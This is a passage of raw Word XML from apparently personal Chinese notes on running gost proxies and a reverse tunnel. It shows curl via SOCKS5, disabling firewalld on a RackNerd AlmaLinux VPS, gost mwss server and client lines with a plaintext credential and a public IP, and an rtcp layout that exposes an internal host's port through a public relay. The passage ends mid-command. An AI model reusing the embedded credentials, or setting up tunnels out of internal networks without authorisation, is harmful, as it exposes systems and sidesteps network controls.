          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>socks</w:t>
      </w:r>
      <w:r w:rsidR="00804236">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2292862F" w14:textId="77777777" w:rsidR="00381B01" w:rsidRPr="00381B01" w:rsidRDefault="00381B01" w:rsidP="009222EB">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91B1F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00381B01">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="191B1F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -x socks5://127.0.0.1:1024 http://www.google.com </w:t>
      </w:r>
      <w:r w:rsidRPr="00381B01">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="9196A1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># -x </w:t>
      </w:r>
      <w:r w:rsidRPr="00381B01">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="9196A1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>参数等同于</w:t>
      </w:r>
      <w:r w:rsidRPr="00381B01">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="9196A1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> --proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3117C728" w14:textId="77777777" w:rsidR="00381B01" w:rsidRDefault="00381B01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D7A757D" w14:textId="54B809E7" w:rsidR="00385BB3" w:rsidRDefault="007A7750" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r w:rsidR="00385BB3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00385BB3">
        <w:t>p.sb</w:t>
      </w:r>
      <w:r w:rsidR="00385BB3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会直接显示当前你连接的</w:t>
      </w:r>
      <w:r w:rsidR="00385BB3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372A6FCC" w14:textId="243EC670" w:rsidR="00381B01" w:rsidRPr="00381B01" w:rsidRDefault="00385BB3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00385BB3">
        <w:t>curl -x socks5://127.0.0.1:6666 ip.sb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0A091C" w14:textId="77777777" w:rsidR="00DD12D3" w:rsidRDefault="00DD12D3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="787DA8C6" w14:textId="55B384DB" w:rsidR="00AA03B9" w:rsidRDefault="00AA03B9" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="154" w:name="_Toc159779615"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>racknerd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00804236">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>socks</w:t>
      </w:r>
      <w:r w:rsidR="00804236">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搭建的坑点</w:t>
      </w:r>
      <w:bookmarkEnd w:id="154"/>
    </w:p>
    <w:p w14:paraId="7F10F0F9" w14:textId="77777777" w:rsidR="00AA03B9" w:rsidRDefault="00AA03B9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BF46C1B" w14:textId="72E8F7B4" w:rsidR="00AA03B9" w:rsidRDefault="00AA03B9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果是</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA03B9">
        <w:t>AlmaLinux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>yum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">net-tools </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等软件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C7EC4C" w14:textId="0957DC76" w:rsidR="00AA03B9" w:rsidRDefault="00AA03B9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防火墙不同于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ufw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>firewalld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCF4F5D" w14:textId="77777777" w:rsidR="00AA03B9" w:rsidRDefault="00AA03B9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1674904C" w14:textId="7A61BF81" w:rsidR="00AA03B9" w:rsidRDefault="00AA03B9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要关闭</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>firewalld</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0148974B" w14:textId="7269B15A" w:rsidR="00AA03B9" w:rsidRDefault="00AA03B9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:t>ctl stop firewalld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DC86BB" w14:textId="2AA47349" w:rsidR="00AA03B9" w:rsidRDefault="00AA03B9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:t>ctl disable firewalld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E643E0A" w14:textId="77777777" w:rsidR="00AA03B9" w:rsidRDefault="00AA03B9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ACD7E47" w14:textId="079D5EBF" w:rsidR="00AA03B9" w:rsidRDefault="006B22F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在上面搭</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>节点，你才能访问到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB990A2" w14:textId="77777777" w:rsidR="00AA03B9" w:rsidRDefault="00AA03B9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F74E9DA" w14:textId="4E209E73" w:rsidR="00AA03B9" w:rsidRDefault="00C14F7D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我写本节的时候，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>alamLinux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>yum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCD7E4F" w14:textId="09080A6F" w:rsidR="00C14F7D" w:rsidRPr="009926EB" w:rsidRDefault="00215FA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:strike/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009926EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:strike/>
        </w:rPr>
        <w:t>需要自己访问</w:t>
      </w:r>
      <w:hyperlink r:id="rId43" w:history="1">
        <w:r w:rsidRPr="009926EB">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:strike/>
          </w:rPr>
          <w:t>https://git.savannah.gnu.org/cgit/screen.git</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009926EB">
        <w:rPr>
          <w:strike/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009926EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:strike/>
        </w:rPr>
        <w:t>把</w:t>
      </w:r>
      <w:r w:rsidRPr="009926EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:strike/>
        </w:rPr>
        <w:t>screen</w:t>
      </w:r>
      <w:r w:rsidRPr="009926EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:strike/>
        </w:rPr>
        <w:t>二进制下载下来运行</w:t>
      </w:r>
      <w:r w:rsidR="009926EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:strike/>
        </w:rPr>
        <w:t>（弃用，暂时没发现</w:t>
      </w:r>
      <w:r w:rsidR="009926EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:strike/>
        </w:rPr>
        <w:t xml:space="preserve"> almaLinux</w:t>
      </w:r>
      <w:r w:rsidR="009926EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:strike/>
        </w:rPr>
        <w:t>如何安装</w:t>
      </w:r>
      <w:r w:rsidR="009926EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:strike/>
        </w:rPr>
        <w:t>make</w:t>
      </w:r>
      <w:r w:rsidR="009926EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:strike/>
        </w:rPr>
        <w:t>命令）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22294205" w14:textId="77777777" w:rsidR="00215FA3" w:rsidRDefault="00215FA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C70F820" w14:textId="53E7492C" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在如下链接中找到解决方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2C06A4" w14:textId="7DF938D4" w:rsidR="009926EB" w:rsidRPr="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009926EB">
        <w:t>https://almalinux.discourse.group/t/no-match-for-argument-screen/790</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AE6DCF" w14:textId="7FE2E9B0" w:rsidR="009926EB" w:rsidRPr="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009926EB">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>dnf install epel-release</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110101CB" w14:textId="2EB75AF8" w:rsidR="00C14F7D" w:rsidRPr="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009926EB">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>dnf install screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173B6EFA" w14:textId="77777777" w:rsidR="00374104" w:rsidRDefault="00374104" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E863157" w14:textId="129E9F0A" w:rsidR="006A3D18" w:rsidRDefault="006A3D18" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后再</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>screen -S gost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>screen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，运行命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF15A38" w14:textId="77777777" w:rsidR="006A3D18" w:rsidRDefault="006A3D18" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>wss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191EF92D" w14:textId="77777777" w:rsidR="006A3D18" w:rsidRDefault="006A3D18" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35875787" w14:textId="281E98B8" w:rsidR="006A3D18" w:rsidRDefault="006A3D18" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD12D3">
        <w:t>./gost -L mwss://</w:t>
      </w:r>
      <w:r w:rsidRPr="008C4ADC">
        <w:t>fivecolorstone:fivecolorstone</w:t>
      </w:r>
      <w:r>
        <w:t>@</w:t>
      </w:r>
      <w:r w:rsidRPr="006A3D18">
        <w:t>192.227.167.113</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD12D3">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD12D3">
        <w:t>9753</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2435A6BE" w14:textId="77777777" w:rsidR="006A3D18" w:rsidRDefault="006A3D18" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>lient:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCD7A77" w14:textId="77777777" w:rsidR="006A3D18" w:rsidRDefault="006A3D18" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008C4ADC">
        <w:t>gost -L=:6666 -F=mwss://fivecolorstone:fivecolorstone@</w:t>
      </w:r>
      <w:r w:rsidRPr="006A3D18">
        <w:t>192.227.167.113</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD12D3">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD12D3">
        <w:t>9753</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE508A8" w14:textId="31E00E2F" w:rsidR="006A3D18" w:rsidRPr="006A3D18" w:rsidRDefault="006A3D18" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22B9C3C0" w14:textId="67399C44" w:rsidR="00374104" w:rsidRDefault="00804236" w:rsidP="00804236">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内网穿透</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692BB615" w14:textId="77777777" w:rsidR="00804236" w:rsidRDefault="00804236" w:rsidP="00804236"/>
    <w:p w14:paraId="1B21D5BD" w14:textId="5D6467F1" w:rsidR="007143FA" w:rsidRDefault="00FC5AD2" w:rsidP="00804236">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考帖子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D69A843" w14:textId="2BAD2F9A" w:rsidR="00FC5AD2" w:rsidRDefault="00FC5AD2" w:rsidP="00804236">
      <w:r w:rsidRPr="00FC5AD2">
        <w:t>https://github.com/ginuerzh/gost/issues/745</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460CEB98" w14:textId="77777777" w:rsidR="007143FA" w:rsidRDefault="007143FA" w:rsidP="00804236"/>
    <w:p w14:paraId="1CD2706C" w14:textId="25C91B24" w:rsidR="007143FA" w:rsidRDefault="00FC5AD2" w:rsidP="00804236">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>假设</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址是公网</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是某内网服务器，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是客户端</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8C510B" w14:textId="6ACC68A2" w:rsidR="00FC5AD2" w:rsidRDefault="00FC5AD2" w:rsidP="00804236">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不能访问，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>想访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口的服务，需要以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为中继，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部署如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10651746" w14:textId="77777777" w:rsidR="00FC5AD2" w:rsidRDefault="00FC5AD2" w:rsidP="00804236"/>
    <w:p w14:paraId="11FFDF5B" w14:textId="6292CAD8" w:rsidR="00FC5AD2" w:rsidRDefault="00FC5AD2" w:rsidP="00804236">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部署：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0522D3" w14:textId="20ED2973" w:rsidR="007143FA" w:rsidRDefault="00FC5AD2" w:rsidP="00804236">
      <w:r w:rsidRPr="00FC5AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gost -L socks5://:2345 (</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>意思是，建立端口为</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2345</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gost</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务端</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>345</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仅是服务端，用来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问搭桥的，不是让人类访问的</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B73692" w14:textId="77777777" w:rsidR="00FC5AD2" w:rsidRDefault="00FC5AD2" w:rsidP="00804236"/>
    <w:p w14:paraId="6B58C788" w14:textId="5FDE8DF8" w:rsidR="007143FA" w:rsidRPr="00FC5AD2" w:rsidRDefault="00FC5AD2" w:rsidP="00804236">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部署：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A65852" w14:textId="7E60679A" w:rsidR="007143FA" w:rsidRPr="00804236" w:rsidRDefault="00FC5AD2" w:rsidP="00804236">
      <w:r w:rsidRPr="00FC5AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gost -L rtcp://:8080/:5000 -F socks5://10.80.5.244:2345 (</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
